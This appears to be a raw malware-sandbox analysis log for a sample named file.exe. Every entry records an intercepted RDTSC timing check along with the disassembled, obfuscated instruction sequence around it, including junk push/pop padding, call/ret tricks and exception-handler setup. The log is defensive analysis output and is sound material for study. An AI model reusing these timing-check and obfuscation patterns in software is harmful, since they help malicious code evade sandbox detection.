Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCF3F1 second address: BCF3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCF3F9 second address: BCF3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C171A6 second address: C171C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F4764D9CBE3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C171C8 second address: C171CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1773C second address: C17740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C17740 second address: C1774E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F476474B516h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1774E second address: C177A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jl 00007F4764D9CBD6h 0x00000010 push 00000000h 0x00000012 add dword ptr [ebp+122D1BDDh], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F4764D9CBD8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D244Bh], esi 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push esi 0x0000003f pop esi 0x00000040 jmp 00007F4764D9CBDCh 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C177A1 second address: C177A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C177A6 second address: C177CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4764D9CBDEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4764D9CBDFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C177CE second address: C177D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1985C second address: C19879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBDAh 0x00000007 pushad 0x00000008 jl 00007F4764D9CBD6h 0x0000000e ja 00007F4764D9CBD6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC0246 second address: BC0252 instructions: 0x00000000 rdtsc 0x00000002 je 00007F476474B51Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC0252 second address: BC0259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A09C second address: C1A11B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B51Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D3655h] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 xor dword ptr [ebp+122D2C17h], edx 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F476474B518h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D24C8h], edx 0x00000046 mov eax, dword ptr [ebp+122D0445h] 0x0000004c sub dword ptr [ebp+122D3307h], esi 0x00000052 push FFFFFFFFh 0x00000054 sbb ebx, 5F1B3002h 0x0000005a sub dword ptr [ebp+122D2C11h], ecx 0x00000060 nop 0x00000061 jno 00007F476474B51Eh 0x00000067 push eax 0x00000068 push ebx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AF9C second address: C1AFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AFA0 second address: C1AFC0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F476474B51Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F476474B51Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1CE6B second address: C1CF06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4764D9CBE3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F4764D9CBD8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a pushad 0x0000002b mov ecx, dword ptr [ebp+122D244Bh] 0x00000031 mov esi, 4F6B8635h 0x00000036 popad 0x00000037 call 00007F4764D9CBE4h 0x0000003c mov edi, dword ptr [ebp+122D55C3h] 0x00000042 pop ebx 0x00000043 push 00000000h 0x00000045 call 00007F4764D9CBDCh 0x0000004a mov dword ptr [ebp+122D26D3h], ecx 0x00000050 pop ebx 0x00000051 push 00000000h 0x00000053 mov edi, 2750CF38h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F4764D9CBE9h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1C0E8 second address: C1C11A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F476474B520h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F476474B523h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1CF06 second address: C1CF0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1C11A second address: C1C120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1CF0B second address: C1CF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4764D9CBD6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1C120 second address: C1C124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1CF1E second address: C1CF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4764D9CBDEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1CF31 second address: C1CF36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1D10B second address: C1D10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1D10F second address: C1D12B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1D12B second address: C1D1A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F4764D9CBD8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D19E4h] 0x0000002b push dword ptr fs:[00000000h] 0x00000032 call 00007F4764D9CBDAh 0x00000037 mov ebx, dword ptr [ebp+122D1A1Ah] 0x0000003d pop edi 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 jns 00007F4764D9CBDCh 0x0000004b mov eax, dword ptr [ebp+122D05B1h] 0x00000051 mov ebx, dword ptr [ebp+122D28C8h] 0x00000057 push FFFFFFFFh 0x00000059 mov dword ptr [ebp+122D295Eh], ecx 0x0000005f nop 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1D1A3 second address: C1D1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1D1AA second address: C1D1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4764D9CBE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FE84 second address: C1FE8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FE8A second address: C1FE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FE8E second address: C1FE92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FE92 second address: C1FED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4764D9CBDFh 0x0000000e nop 0x0000000f add edi, dword ptr [ebp+122D27B6h] 0x00000015 push 00000000h 0x00000017 ja 00007F4764D9CBDCh 0x0000001d mov dword ptr [ebp+1245868Bh], esi 0x00000023 push 00000000h 0x00000025 movsx ebx, di 0x00000028 xchg eax, esi 0x00000029 jmp 00007F4764D9CBDEh 0x0000002e push eax 0x0000002f push esi 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C20E22 second address: C20E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C240BE second address: C24130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F4764D9CBD8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov edi, dword ptr [ebp+122D34E1h] 0x00000027 push 00000000h 0x00000029 sub bh, 00000051h 0x0000002c push 00000000h 0x0000002e mov ebx, 04E70E31h 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 jno 00007F4764D9CBD8h 0x0000003b pushad 0x0000003c push eax 0x0000003d pop eax 0x0000003e jmp 00007F4764D9CBE2h 0x00000043 popad 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jp 00007F4764D9CBE2h 0x0000004e jmp 00007F4764D9CBDCh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C242B7 second address: C242C1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F476474B516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23272 second address: C23300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 mov edi, 767DBC57h 0x0000000c mov dword ptr [ebp+12470332h], esi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 jmp 00007F4764D9CBE3h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 jmp 00007F4764D9CBE5h 0x0000002a mov eax, dword ptr [ebp+122D0E51h] 0x00000030 push FFFFFFFFh 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F4764D9CBD8h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c jnc 00007F4764D9CBDDh 0x00000052 nop 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F4764D9CBDCh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23300 second address: C23320 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F476474B51Ch 0x00000008 js 00007F476474B516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F476474B51Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C242C1 second address: C24354 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov di, 4403h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 or ebx, dword ptr [ebp+122D1B20h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 jc 00007F4764D9CBE2h 0x00000027 jng 00007F4764D9CBDCh 0x0000002d jl 00007F4764D9CBD6h 0x00000033 mov eax, dword ptr [ebp+122D04A5h] 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F4764D9CBD8h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 jc 00007F4764D9CBDCh 0x00000059 sub dword ptr [ebp+122D1B20h], eax 0x0000005f push FFFFFFFFh 0x00000061 push 00000000h 0x00000063 push ebx 0x00000064 call 00007F4764D9CBD8h 0x00000069 pop ebx 0x0000006a mov dword ptr [esp+04h], ebx 0x0000006e add dword ptr [esp+04h], 0000001Ah 0x00000076 inc ebx 0x00000077 push ebx 0x00000078 ret 0x00000079 pop ebx 0x0000007a ret 0x0000007b add dword ptr [ebp+1244E238h], esi 0x00000081 nop 0x00000082 pushad 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23320 second address: C23326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C24354 second address: C24371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F4764D9CBDCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C27276 second address: C2727C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2727C second address: C27286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F4764D9CBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30479 second address: C3047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3047D second address: C304AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4764D9CBDDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4764D9CBE7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C304AA second address: C304AF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C304AF second address: C304B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35986 second address: C35990 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F476474B516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35A2E second address: C35A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35A34 second address: C35A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BF35 second address: C3BF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BF3B second address: C3BF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3B228 second address: C3B22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3B3A4 second address: C3B3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3B3AE second address: C3B3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4764D9CBDFh 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BD9E second address: C3BDA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BDA2 second address: C3BDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4764D9CBD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F4764D9CBEEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C415A2 second address: C415AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1580E second address: C15812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15812 second address: C15852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, dword ptr [ebp+122D1FD4h] 0x00000010 movsx ecx, si 0x00000013 lea eax, dword ptr [ebp+1248B58Ch] 0x00000019 jo 00007F476474B51Ch 0x0000001f mov edi, dword ptr [ebp+122D55ADh] 0x00000025 nop 0x00000026 push eax 0x00000027 jp 00007F476474B518h 0x0000002d pushad 0x0000002e popad 0x0000002f pop eax 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push ebx 0x00000034 jmp 00007F476474B51Bh 0x00000039 pop ebx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15852 second address: C15857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15D65 second address: C15D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F476474B51Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15DED second address: C15DF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F4764D9CBD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C160BA second address: C160C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C16257 second address: C162C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F4764D9CBE5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F4764D9CBD8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000004h 0x0000002c call 00007F4764D9CBE8h 0x00000031 mov dword ptr [ebp+12470C50h], ecx 0x00000037 pop edx 0x00000038 mov cl, dl 0x0000003a push eax 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e jnc 00007F4764D9CBD6h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1663F second address: C16645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C169B7 second address: C169BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C169BB second address: C169E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F476474B518h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C169E0 second address: C169FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4764D9CBE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C169FD second address: C16A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+1244FD23h], edi 0x00000012 lea eax, dword ptr [ebp+1248B58Ch] 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F476474B518h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 jnc 00007F476474B521h 0x00000038 nop 0x00000039 pushad 0x0000003a push eax 0x0000003b pushad 0x0000003c popad 0x0000003d pop eax 0x0000003e pushad 0x0000003f jmp 00007F476474B51Bh 0x00000044 push edx 0x00000045 pop edx 0x00000046 popad 0x00000047 popad 0x00000048 push eax 0x00000049 push ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F476474B526h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C16A87 second address: BF130B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F4764D9CBD8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 sub di, F9E5h 0x00000027 call dword ptr [ebp+12450382h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push ecx 0x00000030 pushad 0x00000031 popad 0x00000032 pushad 0x00000033 popad 0x00000034 pop ecx 0x00000035 push eax 0x00000036 pushad 0x00000037 popad 0x00000038 pop eax 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF130B second address: BF1325 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F476474B522h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1325 second address: BF1329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
